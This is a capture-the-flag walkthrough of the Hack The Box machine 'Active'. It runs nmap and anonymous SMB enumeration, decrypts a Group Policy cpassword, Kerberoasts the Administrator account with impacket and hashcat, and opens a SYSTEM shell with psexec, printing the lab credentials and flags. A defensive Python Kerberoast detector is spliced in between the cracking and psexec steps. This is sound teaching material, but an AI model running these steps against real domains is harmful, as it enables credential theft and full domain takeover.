Hackthebox - Active

Box Information

Box Type

Information Gathering

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-22 02:56 EDT
Nmap scan report for 10.10.10.100
Host is up (0.32s latency).
Not shown: 65513 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-22 06:57:01Z)
135/tcp   open  msrpc?
139/tcp   open  netbios-ssn?
389/tcp   open  tcpwrapped
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msdfsr?
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  unknown
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  unknown
49155/tcp open  tcpwrapped
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  tcpwrapped
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  unknown
49171/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-22T06:58:32
|_  start_date: 2022-04-22T06:55:19

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   316.49 ms 10.10.14.1
2   316.60 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.91 seconds

SMB

SMB is open on the target, so let's enumerate it:

┌──(root💀kali)-[~/Desktop]
└─# smbmap -H 10.10.10.100                  
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                  
        Disk                                           Permissions     Comment
        ----                                           -----------     -------
        ADMIN$                                         NO ACCESS       Remote Admin
        C$                                             NO ACCESS       Default shar
        IPC$                                           NO ACCESS       Remote IPC
        NETLOGON                                       NO ACCESS       Logon server
        Replication                                    READ ONLY
        SYSVOL                                         NO ACCESS       Logon server
        Users                                          NO ACCESS

The Replication share is readable anonymously, so let's look inside it:

┌──(root💀kali)-[~/Desktop]
└─# smbclient //10.10.10.100/Replication    
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 249292 blocks available

There is an active.htb folder; download the whole tree:

recurse ON
prompt OFF
mget *
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

The file above contains an account name and an encrypted password:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
username = active.htb\SVC_TGS
cpassword = edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Exploitation

Decrypt it with gpp-decrypt, which ships with Kali:

┌──(root💀kali)-[~/Desktop]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
username = SVC_TGS
password = GPPstillStandingStrong2k18

Now that we have credentials, go back to SMB and look at the other shares:

smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 279115 blocks available

That puts us straight onto the user's profile; let's look for anything of value:

cd SVC_TGS\Desktop\
get user.txt
┌──(root💀kali)-[~/Desktop]
└─# cat user.txt   
a8644850ef3290ae34457a8ad9982d5e

That gives us the user flag.

Privilege Escalation

Port 88 on this machine runs Kerberos, which we can go after with impacket:

https://github.com/SecureAuthCorp/impacket

Next, add the target to the hosts file:

echo 10.10.10.100 active.htb >> /etc/hosts

Then run GetUserSPNs.py with the SVC_TGS credentials:

┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-04-22 02:56:29.468554             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$65399e5d81a676e87013d1d2c95a9919$...

Save this hash to a file and crack it with hashcat:

hashcat hash /usr/share/wordlists/rockyou.txt -m 13100

Ticketmaster1968
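The detection side of the Kerberoast step above, as an added example that is not part of the writeup or of impacket: a `GetUserSPNs.py -request` run makes the domain controller log Security Event 4769 with Ticket Encryption Type 0x17 (RC4-HMAC), the etype behind the `$krb5tgs$23$` prefix and hashcat mode 13100. The records below are constructed, with dictionary keys simplified from the event's rendered fields, and the check scores each requester on RC4 tickets for user-owned service accounts.

```python
"""Flag Kerberoasting from Windows Security Event 4769 (service ticket requests)."""
from collections import defaultdict

# Ticket Encryption Type values as logged in 4769; hashcat mode per etype.
ETYPES = {"0x17": ("RC4-HMAC", 13100), "0x11": ("AES128-CTS", 19600),
          "0x12": ("AES256-CTS", 19700)}
RC4_HMAC = "0x17"

# Constructed 4769 records (not real DC logs): a normal AES ticket for the
# DC's own account, then SVC_TGS pulling an RC4 ticket for the Administrator
# account that owns active/CIFS:445, as GetUserSPNs.py -request does.
SAMPLE_4769 = [
    {"AccountName": "alice@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"AccountName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.2", "Status": "0x0"},
    {"AccountName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.2", "Status": "0x0"},
]


def is_user_service(service_name):
    """Only SPNs owned by user accounts are crackable at human-password
    strength. Machine accounts ('$') have long random passwords and krbtgt is
    the TGT service, so both are excluded to cut noise."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def hash_etype(krb5tgs_hash):
    """Map a hash header like '$krb5tgs$23$*user$REALM$spn*$...' to its
    encryption type, showing why AES-only service accounts matter."""
    parts = krb5tgs_hash.split("$")
    code = "0x%x" % int(parts[2])           # '23' -> '0x17'
    return ETYPES.get(code, ("unknown", None))[0]


def detect_kerberoast(events, min_targets=1):
    """Return {requester: [services]} for accounts that obtained RC4 service
    tickets for at least min_targets distinct user-owned services."""
    targets = defaultdict(set)
    for ev in events:
        if ev.get("Status") != "0x0":          # failed requests yield no ticket
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if not is_user_service(ev["ServiceName"]):
            continue
        targets[ev["AccountName"]].add(ev["ServiceName"])
    return {who: sorted(s) for who, s in targets.items() if len(s) >= min_targets}
```

In a real sweep set `min_targets` to 2 or more, since a roast typically requests every SPN at once, and pair the alert with the fix: AES-only `msDS-SupportedEncryptionTypes` and a long random or gMSA password on every account that owns an SPN.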
┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CahMAAGa.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service jzgq on 10.10.10.100.....
[*] Starting service jzgq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

That gives us a shell as NT AUTHORITY\SYSTEM, the Windows equivalent of root.

c:\Users\Administrator\Desktop> type root.txt
d7a6880e1ed8648dcb9012f911819322

That gives us the root flag.